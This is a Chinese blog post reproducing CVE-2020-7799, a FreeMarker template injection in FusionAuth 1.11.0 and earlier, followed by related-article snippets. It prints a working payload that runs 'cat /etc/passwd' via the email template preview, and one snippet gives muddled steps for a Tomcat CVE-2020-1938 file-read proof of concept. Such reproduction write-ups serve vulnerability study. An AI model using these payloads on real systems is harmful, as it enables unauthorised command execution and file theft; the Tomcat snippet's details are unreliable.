漏洞复现----7、FusionAuth 远程命令执行漏洞(CVE-2020-7799)

已于 2022-05-30 15:27:35 修改
阅读量1.4k 收藏
点赞数
分类专栏: # 漏洞复现 文章标签: CVE-2020-7799 FusionAuth
于 2021-11-24 17:59:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sycamorelg/article/details/117737584
版权

文章目录

一、漏洞简介

1、FusionAuth

FusionAuth是一个免费的身份管理平台,安装简单,易于集成。FusionAuth提供登录、注册、MFA、SSO、电子邮件模板、本地化、密码控制、强哈希、网络挂钩、基于角色的访问控制等功能。

2、Apache FreeMarker

FreeMarker是一款模板引擎:即一种基于模板和要改变的数据,并用来生成输出文本(HTML网页,电子邮件,配置文件,源代码等)的通用工具。它不是面向最终用户的,而是一个Java类库,是一款程序员可以嵌入他们所开发产品的组件。
FreeMarker是免费的,基于Apache许可证2.0版本发布。

3、漏洞描述

FusionAuth使用了 Apache FreeMarker 模板引擎,经过身份验证的用户允许编辑电子邮件模板(Settings/Email Templates/Edit/Preview),可通过利用freemarker.template.utility.Execute执行任意系统命令。

影响版本
FusionAuth <= 1.11.0

二、漏洞复现

1、利用账号密码登录系统

2、点击Preview:
在这里插入图片描述
3、修改Default HTML参数如下:

${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}}

在这里插入图片描述
4、点击Preview,命令执行。
在这里插入图片描述

李沉肩
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
Python库 | fusionauth_client-1.24.0-py3-none-any.whl
02-16
python库,解压后可用。 资源全名:fusionauth_client-1.24.0-py3-none-any.whl
FusionAuthRCE(CVE-2020-7799)复现
锋刃科技的博客
08-02 1179
简介 FusionAuth是一个免费的身份管理平台,安装简单,易于集成。FusionAuth提供登录、注册、MFA、SSO、电子邮件模板、本地化、密码控制、强哈希、网络挂钩、基于角色的访问控制等功能。 影响版本 FusionAuth <= 1.11.0 环境搭建 下载 FusionAuth 1.10.0 wget https://storage.googleapis.com/inversoft_products_j098230498/products/fusionauth/1.10.0/
[CVE-2020-7799] Apache FreeMarker模板FusionAuth远程代码执行
公众号shadow sock7
02-05 1593
安装的时候一直出现这样的错误, 而且每次响应都很快,感觉可能并不是账号密码出了问题,然后查看日志发现可能是驱动没加载正确: 后来通过调试, 搞了半天确实是没有加载到mysql驱动: 然而我把mysql驱动jar包放到 fusionauth-app-1.10.0/fusionauth-app/apache-tomcat/lib/ 目录下,发现无法打开zip包: 参考 https://fus...
freemarker 使用数据字典_CVE-2020-7799:FreeMarker模板FusionAuth RCE复现
weixin_39781945的博客
11-19 271
0x01 简介FusionAuth是一个免费的身份管理平台,安装简单,易于集成。FusionAuth提供登录、注册、MFA、SSO、电子邮件模板、本地化、密码控制、强哈希、网络挂钩、基于角色的访问控制等功能。0x02 漏洞概述一个有修改 email 或者 theme 模板权限的用户可以通过使用 Apache FreeMarker engine 里的 freemarker.template.util...
Huawei FusionCompute产品的log4j2漏洞规避指导
shoulham的博客
12-15 1329
** Huawei FusionCompute产品的log4j2漏洞规避指导 ** 【涉及版本】 FusionCompute版本号>=6.5.0 【漏洞修补措施】 需要通过ssh工具登录VRM管理节点,请提前准备好gandalf和root账号密码 1. 使用ssh工具登录VRM备节点,执行以下命令备份相关脚本 cp -a /opt/galax/vrm/om/analyzer/bin/service.sh /opt/galax/vrm/om/analyzer/bin/service.sh.bak
Oracle Fusion 中间件漏洞已遭在野利用
smellycat000的专栏
11-30 880
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士美国网络安全和基础设施安全局 (CISA) 提醒称,在2022年年初修复的一个Oracle Fusion 中间件漏洞 (CVE-2021-35587)已遭利用。CVE-2021-35587影响提供Oracle Fusion 中间件单点登录解决方案的 Oracle Access Manager。发现该漏洞的研究人员指出,受影响产品的用户中很多都是大...
oauth0 oauth2_使用oauth确保本机React
weixin_26646901的博客
09-06 761
oauth0 oauth2In this tutorial, we will set up a React Native application to work with OAuth. We’ll use FusionAuth for auth, but the React Native code should work with any OAuth compliant server.在本教程中,...
如何在vue js中安全地实现oauth
weixin_26723981的博客
09-01 1211
In this article, we will discuss the step-by-step process of implementing the OAuth Authorization Code Grant in a Vue.js app. We’ll use FusionAuth as the IdP and also show you how to configure FusionA...
Drupal 修复远程代码执行漏洞
smellycat000的专栏
11-20 242
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队周三,Drupal 内容管理系统 (CMS) 发布更新,修复了和不正确清理所上传文件名称有关的一个远程代码执行漏洞 (CVE...
Java FreeMarker模板引擎注入深入分析
蚁景网安学院
11-22 1164
最近和 F1or 大师傅一起挖洞的时候发现一处某 CMS SSTI 的 0day,之前自己在复现 jpress 的一些漏洞的时候也发现了 SSTI 这个洞杀伤力之大。今天来好好系统学习一手。
远程代码执行漏洞—— CVE-2020-11975 Apache Unomi
aming小老弟
02-19 981
QQ 1274510382 Wechat JNZ_aming 商业联盟 QQ群538250800 技术搞事 QQ群599020441 解决方案 QQ群152889761 加入我们 QQ群649347320 共享学习 QQ群674240731 纪年科技aming 网络安全 ,深度学习,嵌入式,机器强化,生物智能,生命科学。 叮叮叮:产品已上线 —>关注 官方-微信公众号——济南纪年信息科技有限公司 民生项目:商城加盟/娱乐交友/创业商圈/外包兼职开发-项目发布/ 安全项目:态势感..
从ofcms的模板注入漏洞CVE-2019-9614)浅析SSTI漏洞
Alexz__的博客
05-04 1673
什么是SSTI漏洞 CVE-2019-9614漏洞复现 ofcms的freemarker模板源码简要分析 壹 什么是SSTI漏洞 SSTI:Server Side Template Injection 服务器端模板注入漏洞 既然是注入漏洞,那么它所运用的核心思想就和XSSSQL注入差不多,都是运用不安全的用户输入,将正常的数据接收处进行恶意输入,导致服务器将用户输入数据当成代码并执行,从而完成一些危险的行为 我们针对SSTI来看,他的主要载体是web站点MVC架构之上,也就是从...
CVE-2020-16898: Windows TCP/IP远程执行代码漏洞通告
爱国小白帽
10-14 6672
原创 360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-101402 报告来源:360CERT 报告作者:360CERT 更新日期:2020-10-14 0x01 漏洞简述 2020年10月14日,360CERT监测发现 Microsoft 发布了 TCP/IP远程代码执行漏洞 的风险通告,该漏洞编号为CVE-2020-16875,漏洞等级:严重,漏洞评分:9.8。 远程攻击者通过构造特制的ICMPv6 Router Advertisemen
OFCMS 1.1.2模板注入漏洞CVE-2019-9614)
weixin_44770698的博客
08-21 499
OFcms模板注入漏洞
Tomact_CVE-2020-1938漏洞复现
最新发布
08-31
复现Tomact_CVE-2020-1938漏洞,可以按照以下步骤进行操作: 1. 下载POC:可以使用以下命令下载POC文件: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 2. 在攻击机上搭建环境:确保攻击机上已经安装了Tomcat服务器,并且版本在3.4.3以下,可以使用以下命令下载并安装Tomcat 3.4.3版本: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 3. 配置Tomcat服务器:在Tomcat安装目录下,找到server.xml文件,在<Connector>标签中添加以下内容: protocol="org.apache.coyote.ajp.AjpNio2Protocol" secretRequired="false" 4. 启动Tomcat服务器:在Tomcat安装目录下运行启动脚本,如./catalina.sh run 5. 复现漏洞:使用以下命令触发漏洞复现: python3 file_include.py -u http://目标IP:目标端口/ -p /WEB-INF/web.xml 以上步骤可以帮助你复现Tomact_CVE-2020-1938漏洞。请注意,在进行漏洞复现时务必遵守道德规范,并获得合法授权进行测试。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [CVE-2020-1938 漏洞复现](https://blog.csdn.net/weixin_48799157/article/details/124889366)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2020-1938 Tomcat文件包含漏洞复现](https://blog.csdn.net/qq_49279082/article/details/129018726)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李沉肩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值